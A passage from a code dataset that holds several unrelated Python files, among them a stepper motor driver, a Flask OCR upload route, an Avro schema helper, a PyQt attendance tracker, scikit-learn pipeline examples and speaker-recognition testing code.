actualy a delay between PUL pulses - effectively sets the mtor rotation speed.\nprint('Speed set to ' + str(delay))\n#\ncycles = 1000 # This is the number of cycles to be run once program is started.\ncyclecount = 0 # This is the iteration of cycles to be run once program is started.\nprint('number of Cycles to Run set to ' + str(cycles))\n#\n#\ndef forward():\n GPIO.output(ENA, GPIO.HIGH)\n # GPIO.output(ENAI, GPIO.HIGH)\n print('ENA set to HIGH - Controller Enabled')\n #\n sleep(.5) # pause due to a possible change direction\n GPIO.output(DIR, GPIO.LOW)\n # GPIO.output(DIRI, GPIO.LOW)\n print('DIR set to LOW - Moving Forward at ' + str(delay))\n print('Controller PUL being driven.')\n for x in range(durationFwd): \n GPIO.output(PUL, GPIO.HIGH)\n sleep(delay)\n GPIO.output(PUL, GPIO.LOW)\n sleep(delay)\n GPIO.output(ENA, GPIO.LOW)\n # GPIO.output(ENAI, GPIO.LOW)\n print('ENA set to LOW - Controller Disabled')\n sleep(.5) # pause for possible change direction\n return\n#\n#\ndef reverse():\n GPIO.output(ENA, GPIO.HIGH)\n # GPIO.output(ENAI, GPIO.HIGH)\n print('ENA set to HIGH - Controller Enabled')\n #\n sleep(.5) # pause due to a possible change direction\n GPIO.output(DIR, GPIO.HIGH)\n # GPIO.output(DIRI, GPIO.HIGH)\n print('DIR set to HIGH - Moving Backward at ' + str(delay))\n print('Controller PUL being driven.')\n #\n for y in range(durationBwd):\n GPIO.output(PUL, GPIO.HIGH)\n sleep(delay)\n GPIO.output(PUL, GPIO.LOW)\n sleep(delay)\n GPIO.output(ENA, GPIO.LOW)\n # GPIO.output(ENAI, GPIO.LOW)\n print('ENA set to LOW - Controller Disabled')\n sleep(.5) # pause for possible change direction\n return\n\n# while cyclecount < cycles:\n# forward()\n# reverse()\n# cyclecount = (cyclecount + 1)\n# print('Number of cycles completed: ' + str(cyclecount))\n# print('Number of cycles remaining: ' + str(cycles - cyclecount))\n# #\nwhile True:\n char = getch()\n if(char == \"w\"):\n forward()\n # stepper_worker(kit.stepper1,\n # 20,\n # move_dir[0],\n # stepstyles[3])\n if(char == \"s\"):\n reverse()\n # stepper_worker(kit.stepper1,\n # 20,\n # move_dir[1],\n # stepstyles[3])\n # if(char == \"e\"):\n # stepper_worker(kit.stepper2,\n # 20,\n # move_dir[0],\n # stepstyles[3])\n # if(char == \"d\"):\n # stepper_worker(kit.stepper2,\n # 20,\n # move_dir[1],\n # stepstyles[3])\n if(char == \"o\"):\n quit()\n\nGPIO.cleanup()\nprint('Cycling Completed')\n","sub_path":"Bot codes/drivertest.py","file_name":"drivertest.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473545837","text":"# coding:utf-8\n\nfrom flask import Flask,render_template,request,redirect,url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom extraction_info import orc_text\nfrom flask import jsonify\n\n\napp = Flask(__name__)\n\n@app.route('/upload', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n f = request.files['file']\n basepath = os.path.dirname(__file__) # 当前文件所在路径\n upload_path = os.path.join(r'D:\\code',secure_filename(f.filename))#安全获取\n print(upload_path)\n # upload_path()\n f.save(upload_path)\n result = orc_text(upload_path)\n return ':'.join(result)\n # if request.method == 'POST':\n # f = request.files['file']\n # basepath = path.abspath(path.dirname(__file__)) # 获取当前文件的绝对路径\n # filename = secure_filename(f.filename)\n # upload_path = path.join(basepath, 'static', 'uploads', filename) # 文件要存放的目标位置\n # f.save(upload_path)\n # return redirect(url_for('upload'))\n\n return render_template(r'upload.html')#upload.html必须放在templates文件夹下面\n\n@app.route('/test', methods=['POST', 'GET'])\ndef testjson():\n return jsonify(name='zhangsan',age=22)\n\nif __name__ == '__main__':\n app.run()","sub_path":"OCR接口/flasktest.py","file_name":"flasktest.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"540753591","text":"import avro\nimport copy\n\ndef specialize(items, spec):\n if isinstance(items, dict):\n for n in (\"type\", \"items\", \"values\"):\n if n in items:\n items[n] = specialize(items[n], spec)\n return items\n if isinstance(items, list):\n n = []\n for i in items:\n n.append(specialize(i, spec))\n return n\n if isinstance(items, basestring):\n if items in spec:\n return spec[items]\n return items\n\ndef extend_avro(items):\n types = {t[\"name\"]: t for t in items}\n n = []\n for t in items:\n if \"extends\" in t:\n r = copy.deepcopy(types[t[\"extends\"]])\n r[\"name\"] = t[\"name\"]\n if \"specialize\" in t:\n r[\"fields\"] = specialize(r[\"fields\"], t[\"specialize\"])\n r[\"fields\"].extend(t[\"fields\"])\n\n for y in [x for x in r[\"fields\"] if x[\"name\"] == \"class\"]:\n y[\"type\"] = {\"type\": \"enum\", \"symbols\": [r[\"name\"]], \"name\": r[\"name\"]+\"_class\"}\n\n\n r[\"extends\"] = t[\"extends\"]\n r[\"abstract\"] = t.get(\"abstract\", False)\n r[\"doc\"] = t.get(\"doc\", \"\")\n types[t[\"name\"]] = r\n t = r\n n.append(t)\n return n\n\ndef schema(j):\n names = avro.schema.Names()\n j = extend_avro(j)\n for t in j:\n if not t.get(\"abstract\"):\n avro.schema.make_avsc_object(t, names)\n return names\n","sub_path":"reference/cwltool/avro_ld/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"150689347","text":"#controlFlow.py\nx = int(input(\"please input an integer:\"))\n\nif x < 0:\n x = 0\n print( 'Negative changed to zero')\nelif x == 0:\n print( 'Zero')\nelif x == 1:\n print( 'Single')\nelse:\n print( 'More')\n\nmylist = ['a','goober','zxv']\n\nfor listmember in mylist:\n print( listmember)\n\n#now use ranges just like we'd do a normal 'for' in C/C++\nprint('mylist = range(12)')\nmylist = range(12)\n\nfor listmember in mylist:\n print( listmember)\n\n#shorthand:\nprint( \"shorthand..\")\nfor listmember in range(3):\n print( listmember)\n\n#negative progression..\nprint( \"start negative progression\")\n# range([start],stop [,step])\nfor currofst in range(0,-10,-1):\n print( currofst)\n \n#while statement.. with continue\n#only print odd numbers, but iterate over all numbers between\n#from 0 to 19\nmyint = 0\nwhile myint < 20:\n if((myint%2) == 0):\n myint += 1\n continue\n print( myint)\n myint += 1\n\n# break on 12\nmyint = 0\nwhile myint < 20:\n if(myint==12):\n break\n print( myint)\n myint += 1\n","sub_path":"Python/controlFlow.py","file_name":"controlFlow.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"310928350","text":"\"\"\"This file runs the plugin as a standalone program.\n\nPut your main code in this file and put the worker files into the\nmodule folder. All files in this folder are loaded dynamically.\n\"\"\"\nimport os\nimport json\n#using the import into global to ensure that files are loaded dynamically\nfrom module import *\nimport lib\n#its best practice to export your convenience functions from this file\n#if your program might be loaded as a module\n\n\ndef analyse(file_data):\n \"\"\"Entry point to the processing code.\n All code from this point should accept a bytestream and return JSON\n \"\"\"\n return processing.processing(file_data)\n\n\ndef analyse_file(file_name, output_folder):\n \"\"\"Called by SPOTLESS for single file matches\n Modify this function if you handle files in a specific way.\n \"\"\"\n if not os.path.isfile(file_name):\n return False\n if not os.path.isdir(output_folder):\n return False\n\n f = open(file_name, 'r')\n try:\n buf = f.read()\n finally:\n #ensure f is closed properly even if there is a problem\n f.close()\n\n #Call our analysis functions\n results = analyse(buf)\n\n try:\n json.loads(results)\n except(ValueError):\n return False\n #going to need to save the output somehow at this point...\n #save(results)\n return True\n\n\ndef analyse_folder(folder_name, output_folder):\n \"\"\"Called by SPOTLESS for directory matches\n Modify this function to enable specialised directory processing.\n \"\"\"\n for file_name in lib.fileLib.dirIter(folder_name):\n analyse_file(file_name, output_folder)\n return True\n\n#We run our code only if we are called as the main program,\n#otherwise the module is being imported.\nif __name__ == '__main__':\n\n import argparse\n desc = 'SPOTLESS framework example plugin package'\n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument('-i', '--input',\n type=str,\n help='The input file or directory',\n required=True)\n\n parser.add_argument('-o', '--output',\n type=str,\n help='The output file or directory',\n required=True)\n\n args = parser.parse_args()\n\n if not os.path.isdir(args.output):\n print('Critical: Output is not a folder')\n sys.exit()\n\n if os.path.isfile(args.input):\n analyse_file(args.input, args.output)\n elif os.path.isdir(args.input):\n analyse_folder(args.input, args.output)\n else:\n print('Critical: Input is invalid')\n sys.exit()\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"275676089","text":"def changePossibilities(amount, denominations):\n # create a list with size equal to the amount of money plus one\n # the value in each element will be updated to represent the number\n # of combinations possible given the denominations\n combinations = [0] * (amount + 1)\n\n # set the value of the zeroth element to 1 as starting/seed value\n combinations[0] = 1\n \n # loop through every denomination\n for denom in denominations:\n # loop through every amount of money upto 'amount' \n for amount in range (1, amount + 1):\n if amount >= denom:\n combinations[amount] += combinations[amount - denom]\n \n return combinations[amount]\n\n\nprint(changePossibilities(4, [1, 2, 3]))\nprint(changePossibilities(100, [1, 5, 10, 25, 50]))\n","sub_path":"python_soln/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"600247569","text":"def maxsubrangesum5(x):\n\tmaxsofar = 0\n\tmaxsuffixsum = 0\n\n\tfor i in range(len(x))[1:]:\n\t\tmaxsuffixsum = max(0, maxsuffixsum + x[i])\n\t\tmaxsofar = max(maxsofar, maxsuffixsum)\n\n\treturn maxsofar\n\ndef maxsubrangesum6(x):\n\tmaxsofar = 0\n\tmaxsuffixsum = 0\n\tstartingPosition = 0\n\tendingPosition = 0\n\tendingPositionDecided = True\n\tpossibleStartPosition = 0\n\tfor i in range(len(x))[1:]:\n\t\tprevmaxsuffixsum = maxsuffixsum\n\t\tprevmaxsofar = maxsofar\n\t\tmaxsuffixsum = max(0, maxsuffixsum + x[i])\n\t\tmaxsofar = max(maxsofar, maxsuffixsum)\n\t\tif prevmaxsuffixsum == 0 and maxsuffixsum != 0:\n\t\t\tpossibleStartPosition = i\n\t\tif prevmaxsofar != maxsofar:\n\t\t\tstartingPosition = possibleStartPosition\n\t\t\tendingPositionDecided = False\n\t\tif prevmaxsuffixsum < maxsuffixsum and not endingPositionDecided:\n\t\t\tendingPosition = i\n\t\t\tendingPositionDecided = True\n\n\treturn [maxsofar, startingPosition, endingPosition]\n\narr = [-2, 1, 5, -4, -22, 4, 10, 8, 1, -8, 3, 4]\n\nprint(maxsubrangesum5(arr))\nprint(maxsubrangesum6(arr))\n","sub_path":"maxSubrangeSum.py","file_name":"maxSubrangeSum.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"575503086","text":"from PyQt5 import QtWidgets,QtCore\nimport sys\nimport os\nimport sip\nfrom db_connection import clear_scan, search_request, fetch_items, add_request, update_budget, fetch_budget, delete_request, search_request_delete, reduce_quantity_scan, reduce_quantity_item, increase_quantity_item, search_request_delete_item\nfrom PyQt5.QtGui import QIcon, QPixmap\nimport datetime\n\nclass window(QtWidgets.QMainWindow):\n def __init__(self):\n super(window,self).__init__()\n centwid=QtWidgets.QWidget()\n\n self.mylineEdit = QtWidgets.QLineEdit()\n\n f = self.mylineEdit.font()\n f.setPointSize(24) # sets the size to 27\n self.mylineEdit.setFont(f)\n\n\n self.mylineEdit2 = QtWidgets.QLineEdit()\n\n\n self.startNew=1\n #initialise to empty string on start up\n self.mylineEdit.setText(' ')\n self.toggle = False\n\n #barcode scans here and then a returnPressed is registered\n\n #connect to a function\n self.mylineEdit.returnPressed.connect(self.set_sample_name) #here is where I want to delete the previous entry without backspacing by hand\n self.mylineEdit.textChanged.connect(self.delete_previous)\n\n\n total, items = fetch_items()\n print(str(total))\n self.v_box = QtWidgets.QVBoxLayout()\n message = QtWidgets.QLabel(centwid)\n f = message.font()\n f.setPointSize(7) # sets the size to 27\n f.setBold(True)\n message.setFont(f)\n\n self.v_box.addWidget(message)\n\n\n\n self.v_box.addStretch()\n self.v_box.addStretch()\n self.v_box.addStretch()\n\n curr_budget = fetch_budget()\n curr_budget = curr_budget[0]\n\n self.welcome = QtWidgets.QLabel(centwid)\n self.welcome.setText(\"CCS ATTENDANCE\")\n f = self.welcome.font()\n f.setPointSize(24) # sets the size to 27\n f.setBold(True)\n self.welcome.setFont(f)\n\n\n\n\n self.le = QtWidgets.QLineEdit()\n g = self.le.font()\n g.setPointSize(24) # sets the size to 27\n self.le.setFont(g)\n\n self.budget = QtWidgets.QPushButton('Create/Update Event')\n self.budget.setSizePolicy(\n QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Expanding)\n\n\n self.done = QtWidgets.QPushButton('Exit')\n self.done.setSizePolicy(\n QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Expanding)\n\n\n self.budget_status = QtWidgets.QLabel(centwid)\n self.budget_status.setText(\"EVENT: \")\n f = self.budget_status.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.budget_status.setFont(f)\n\n self.message1 = QtWidgets.QLabel(centwid)\n self.message1.setText(\"ID NUMBER: \")\n f = self.message1.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message1.setFont(f)\n\n\n self.message2 = QtWidgets.QLabel(centwid)\n self.message2.setText(\"STUDENT NAME: \")\n f = self.message2.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message2.setFont(f)\n\n self.date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n\n self.message3 = QtWidgets.QLabel(centwid)\n self.message3.setText(\" \")\n\n self.message4 = QtWidgets.QLabel(centwid)\n self.message4.setText(\"DATE: \" + str(self.date))\n f = self.message4.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message4.setFont(f)\n\n self.budget_message = QtWidgets.QLabel(centwid)\n\n\n # self.budget_message.setText(\"Budget Status: \" + str(status))\n f = self.budget_message.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.budget_message.setFont(f)\n\n self.v_box1 =QtWidgets.QVBoxLayout()\n\n\n # Create widget\n self.label = QtWidgets.QLabel(self)\n pixmap = QPixmap('logo.jpg')\n self.label.setPixmap(pixmap)\n\n\n self.v_box1.addWidget(self.welcome)\n self.v_box1.addWidget(self.label)\n self.v_box1.addWidget(self.le)\n self.v_box1.addWidget(self.budget)\n # # self.v_box1.addWidget(self.budget_message)\n self.v_box1.addWidget(self.message4)\n self.v_box1.addWidget(self.budget_status)\n self.v_box1.addWidget(self.message1)\n self.v_box1.addWidget(self.message2)\n self.v_box1.addWidget(self.mylineEdit)\n self.v_box1.addWidget(self.message3)\n self.v_box1.addWidget(self.done)\n self.v_box1.addStretch()\n self.v_box1.addStretch()\n\n\n\n lay=QtWidgets.QHBoxLayout()\n\n\n\n \n lay.addLayout(self.v_box1)\n lay.addLayout(self.v_box)\n \n\n\n centwid.setLayout(lay)\n self.budget.clicked.connect(self.btn_click)\n self.done.clicked.connect(self.btn_click3)\n \n self.setCentralWidget(centwid)\n\n self.show()\n\n def btn_click(self):\n \n sender = self.sender()\n\n if self.le.text() != '':\n\n if sender.text() == 'Create/Update Event':\n if self.toggle is True:\n print(self.le.text())\n budget = self.le.text()\n self.budget_status.setText(\"EVENT: \" + str(budget))\n self.le.hide()\n self.toggle = False\n else:\n self.toggle = True\n self.le.show()\n else:\n \tself.budget_status.setText(\"No Event Input\")\n\n\n def btn_click1(self):\n sender = self.sender()\n item = sender.text()\n item = item.split('-')[0]\n item = item.strip()\n item, quantity = search_request_delete(item)\n if item is False: \n \tdelete_request(item)\n \tself.restart_program()\n else:\n print(str(quantity))\n if int(quantity) == 1:\n delete_request(item)\n else:\n reduce_quantity_scan(item)\n increase_quantity_item(item)\n self.restart_program()\n\n def btn_click3(self):\n QtWidgets.QMessageBox.about(self, \"\",\"Attendance Taking Finished!\")\n app.quit()\n\n #set the sample name variable\n def set_sample_name(self):\n self.sample_name = self.mylineEdit.text()\n print(self.sample_name)\n request = search_request(self.sample_name)\n if request is not False:\n item, value = search_request(self.sample_name)\n if value == '':\n value = ''\n\n\n budget = self.le.text()\n print(str(item) + '-' + str(value))\n added = add_request(str(item), str(value), str(budget), str(self.date))\n if added:\n increase_quantity_item(str(item))\n self.restart_program()\n self.startNew=1\n self.message1.setText(\"ID NUMBER: \" + str(value))\n self.message2.setText(\"STUDENT NAME: \" + str(item))\n self.message3.setText(\"Attendance Taken\")\n else:\n self.restart_program()\n self.startNew\n self.message1.setText(\"ID NUMBER: \" + str(value))\n self.message2.setText(\"STUDENT NAME: \" + str(item))\n self.message3.setText(\"Attendance taken for this event!\") \n else:\n self.message3.setText(\"Student does not exist\")\n self.startNew=1\n\n def delete_previous(self,text):\n if self.startNew:\n self.mylineEdit.setText(text[-1])\n self.startNew=0\n\n\n def clearLayout(self, layout):\n if layout is not None:\n while layout.count():\n item = layout.takeAt(0)\n widget = item.widget()\n if widget is not None:\n widget.deleteLater()\n else:\n self.clearLayout(item.layout())\n\n def restart_program(self):\n\n \n total, items = fetch_items()\n print(items)\n\n self.clearLayout(self.v_box)\n \n\n\n item, value = search_request(self.sample_name)\n\n self.message2.setText(\"STUDENT NAME: \" + str(item))\n f = self.message2.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message2.setFont(f)\n\n\n\n\n \n\napp=QtWidgets.QApplication(sys.argv)\n\nex=window()\nex.setWindowTitle('EC Attendance')\nex.setGeometry(100, 100, 800, 480)\nsys.exit(app.exec_())\n","sub_path":"Attendance/attendance.py","file_name":"attendance.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"236936166","text":"# pyre-ignore-all-errors\nimport unittest\nfrom typing import Callable, Iterable, Iterator, List, TypeVar\n\n\nclass BasicTestCase(unittest.TestCase):\n def test_parameter_specification(self):\n try:\n from .. import ParameterSpecification\n from ..type_variable_operators import (\n KeywordArgumentsOf,\n PositionalArgumentsOf,\n )\n\n TParams = ParameterSpecification(\"TParams\")\n TReturn = TypeVar(\"T\")\n\n def listify(\n f: Callable[TParams, TReturn]\n ) -> Callable[TParams, List[TReturn]]:\n def wrapped(\n *args: PositionalArgumentsOf[TParams],\n **kwargs: KeywordArgumentsOf[TParams]\n ):\n return [f(*args, **kwargs)]\n\n return wrapped\n\n except Exception:\n self.fail(\"ParameterSpecification missing or broken\")\n\n def test_list_variadics(self):\n try:\n from .. import ListVariadic\n from ..type_variable_operators import Map\n\n TReturn = TypeVar(\"T\")\n Ts = ListVariadic(\"Ts\")\n\n def better_map(\n func: Callable[[Ts], TReturn], *args: Map[Iterable, Ts]\n ) -> Iterator[TReturn]:\n return map(func, *args)\n\n except Exception:\n self.fail(\"ListVariadics missing or broken\")\n\n def test_none_throws(self):\n try:\n from .. import none_throws\n\n none_throws(0)\n none_throws(0, \"custom message\")\n except Exception:\n self.fail(\"none_throws missing or broken\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pyre_extensions/tests/simple_tests.py","file_name":"simple_tests.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"96028227","text":"from sklearn.datasets import fetch_openml\r\nfrom sklearn import preprocessing\r\nfrom sklearn.impute import SimpleImputer\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.inspection import permutation_importance\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Pipeline + feature importance\r\n# Pipeline is needed to determine importance of categorical features, see:\r\n# https://scikit-learn.org/stable/auto_examples/inspection/plot_permutation_importance.html\r\n# We do not want the importance of every level of a categorical feature (e.g. gender_male, gender_female),\r\n# but the importance of a categorical feature in total (e.g. gender)\r\n\r\n#############\r\n# Read data #\r\n#############\r\n# Get data from openml\r\nX, y = fetch_openml(\"titanic\", version=1, as_frame=True, return_X_y=True)\r\n\r\n# Write data to disk\r\nX.join(y).to_csv('data/titanic.csv', index = False)\r\n\r\n# Selected categorical and numeric predictors\r\npredictors_cat = ['pclass', 'sex', 'embarked']\r\npredictors_num = ['age', 'sibsp', 'parch', 'fare']\r\npredictors = predictors_num + predictors_cat\r\nX = X[predictors]\r\n\r\n# Split in train and test\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n X, y, stratify=y, random_state=100, test_size=0.2)\r\n\r\n# Check if dataset has missing values\r\npd.isnull(X).sum()\r\n\r\n# Create scaler and fit on training set, \r\n# so scaling parameters of training set are used on test set\r\nscaler = preprocessing.StandardScaler().fit(X_train[predictors_num])\r\n\r\n# Create pipeline for categorical and numerical predictors\r\ncategorical_pipe = Pipeline([\r\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\r\n ('onehot', OneHotEncoder(handle_unknown='ignore'))\r\n])\r\n\r\nnumerical_pipe = Pipeline([\r\n ('imputer', SimpleImputer(strategy='mean')),\r\n ('scaler', scaler)\r\n])\r\n\r\n# Preprocessing\r\npreprocessing = ColumnTransformer(\r\n [('cat', categorical_pipe, predictors_cat),\r\n ('num', numerical_pipe, predictors_num)])\r\n\r\n# Note that preprocessing can be used on the data as:\r\nX_train_2 = preprocessing.fit_transform(X_train)\r\nX_test_2 = preprocessing.fit_transform(X_test)\r\n\r\n# Add column names to X_train_2 with:\r\n# preprocessing.get_feature_names()\r\n# But that gives an error\r\n# See: https://github.com/scikit-learn/scikit-learn/issues/12525\r\n# and https://github.com/scikit-learn/scikit-learn/issues/6425\r\n\r\n##########################\r\n# Permutation importance #\r\n##########################\r\ndef plot_importance(model, X_test, y_test, n_repeats=10, n_jobs=2):\r\n result = permutation_importance(model, X_test, y_test, \r\n n_repeats=n_repeats, n_jobs=n_jobs)\r\n sorted_idx = result.importances_mean.argsort()\r\n fig, ax = plt.subplots()\r\n ax.boxplot(result.importances[sorted_idx].T,\r\n vert=False, labels=X_test.columns[sorted_idx])\r\n ax.set_title(\"Permutation Importances (test set)\")\r\n fig.tight_layout()\r\n plt.show()\r\n \r\n#####################\r\n# Random forest fit #\r\n#####################\r\npipeline_rf = Pipeline(steps=[\r\n ('preprocess', preprocessing),\r\n ('classifier', RandomForestClassifier(random_state=0, n_estimators=100))\r\n])\r\n\r\nrf = pipeline_rf.fit(X_train, y_train)\r\n\r\n# Accuracy\r\nprint(\"RF train accuracy: %0.3f\" % rf.score(X_train, y_train))\r\nprint(\"RF test accuracy: %0.3f\" % rf.score(X_test, y_test))\r\n\r\nplot_importance(rf, X_test, y_test, n_repeats=10, n_jobs=2)\r\n\r\n###############################\r\n# SVM + hyperparameter tuning #\r\n###############################\r\n\r\n# Pipeline with Gridsearch\r\n# https://scikit-learn.org/stable/tutorial/statistical_inference/putting_together.html\r\n# Parameters of pipelines can be set using a ‘__’ separated parameter\r\n# https://stackoverflow.com/q/43366561\r\n\r\nsvc_pipeline = Pipeline(steps=[\r\n ('preprocess', preprocessing),\r\n ('classifier', SVC(random_state=0))\r\n])\r\n\r\nparam_grid_svc = [\r\n {'classifier__C': [1, 10, 100], 'classifier__kernel': ['linear']},\r\n {'classifier__C': [1, 10, 100], 'classifier__gamma': [0.1, 0.01], 'classifier__kernel': ['rbf']},\r\n]\r\n\r\nsvc_gridsearch = GridSearchCV(svc_pipeline, param_grid_svc, scoring = 'accuracy').fit(X_train, y_train)\r\n\r\nprint(\"Best parameter (CV score=%0.3f):\" % svc_gridsearch.best_score_)\r\nprint(svc_gridsearch.best_params_)\r\n\r\nsvc_pipeline_best = Pipeline(steps=[\r\n ('preprocess', preprocessing),\r\n ('classifier', SVC(random_state=0, C=1, gamma=0.1, kernel='rbf'))\r\n])\r\n\r\nsvc_best = svc_pipeline_best.fit(X_train, y_train)\r\n\r\n# Accuracy\r\nprint(\"SVM train accuracy: %0.3f\" % svc_best.score(X_train, y_train))\r\nprint(\"SVM test accuracy: %0.3f\" % svc_best.score(X_test, y_test))\r\n\r\nplot_importance(svc_best, X_test, y_test, n_repeats=10, n_jobs=2)\r\n","sub_path":"predictive_modelling/scikit_pipeline_and_permutation_importance.py","file_name":"scikit_pipeline_and_permutation_importance.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"208109547","text":"import cgi\nfrom flask import (\n\t\tFlask, render_template, flash,\n\t\turl_for, redirect, request\n)\n\n\napp = Flask(__name__)\napp.config.update({\n\t'SECRET_KEY': 'Evolux <3 Python',\n\t'DEBUG': True\n})\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef bar():\n\tif request.method == 'POST':\n\t\tform = cgi.FieldStorage()\n\t\twith open ('lista_bares.yml','a') as fileOutput:\n\t\t\tif '' not in request.form.values():\n\t\t\t\tdados = ''\n\t\t\t\tfor campo in request.form.values():\n\t\t\t\t\tdados += campo + '\\n'\n\t\t\t\tfileOutput.write(dados)\n\t\t\t\tfileOutput.write('\\n---\\n')\n\t\t\telse:\n\t\t\t\tflash('Coloque todos os dados')\n\t\t\n\treturn render_template(\"index.html\")\n\n@app.route(\"/lista\")\ndef exibir():\n\tf = open('lista_bares.yml', 'r')\n\tcontents = f.read()\n\tf.close()\n\treturn render_template(\"lista.html\", contents = contents)\n\t\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"438129140","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom rest_framework import fields, serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom django.db import IntegrityError\n\nfrom coredb.abstracts.getter import get_project_model\nfrom coredb.api.base.tags import TagsMixin\n\n\nclass ProjectNameSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_project_model()\n fields = (\"name\",)\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n uuid = fields.UUIDField(format=\"hex\", read_only=True)\n\n class Meta:\n model = get_project_model()\n fields = (\n \"uuid\",\n \"name\",\n \"description\",\n \"tags\",\n \"created_at\",\n \"updated_at\",\n )\n\n\nclass ProjectDetailSerializer(ProjectSerializer, TagsMixin):\n class Meta(ProjectSerializer.Meta):\n fields = ProjectSerializer.Meta.fields + (\n \"readme\",\n \"live_state\",\n )\n\n def update(self, instance, validated_data):\n validated_data = self.validated_tags(\n validated_data=validated_data, tags=instance.tags\n )\n\n try:\n return super().update(instance=instance, validated_data=validated_data)\n except IntegrityError:\n raise ValidationError(\n f\"A project with name {validated_data['name']} already exists.\"\n )\n\n\nclass ProjectCreateSerializer(ProjectSerializer):\n class Meta(ProjectSerializer.Meta):\n fields = ProjectSerializer.Meta.fields + (\"readme\",)\n\n def create(self, validated_data):\n try:\n return super().create(validated_data)\n except IntegrityError:\n raise ValidationError(\n f\"A project with name {validated_data['name']} already exists.\"\n )\n","sub_path":"platform/coredb/coredb/api/projects/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"609340572","text":"import os\nimport pickle\nimport numpy as np\nfrom scipy.io.wavfile import read\nfrom test999.test2.speakerfeatures import extract_features\nimport time\n\nsource = \"C:/Users/Ibrag/Desktop/Diplom/Datasets/Dataset2/development_set/\"\nmodelpath = \"C:/Users/Ibrag/Desktop/Diplom/Datasets/Dataset2/speaker_models/\"\ntest_file = \"C:/Users/Ibrag/Desktop/Diplom/Datasets/Dataset2/development_set_test.txt\"\nfile_paths = open(test_file, 'r')\n\ngmm_files = [os.path.join(modelpath, fname) for fname in\n os.listdir(modelpath) if fname.endswith('.gmm')]\n\n# Load the Gaussian gender Models\nmodels = [pickle.load(open(fname, 'rb')) for fname in gmm_files]\nspeakers = [fname.split(\"/\")[-1].split(\".gmm\")[0] for fname in gmm_files]\n\n# Read the test directory and get the list of test audio files\nfor path in file_paths:\n\n path = path.strip()\n print(path)\n sr, audio = read(source + path)\n vector = extract_features(audio, sr)\n\n log_likelihood = np.zeros(len(models))\n\n for i in range(len(models)):\n gmm = models[i] # checking with each model one by one\n scores = np.array(gmm.score(vector))\n log_likelihood[i] = scores.sum()\n\n winner = np.argmax(log_likelihood)\n print(\"\\tdetected as - \", speakers[winner])\n time.sleep(1.0)","sub_path":"Code Python/gmm_ubm/test999/test2/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453019128","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport html\nimport os\nimport re\n\nimport pandas 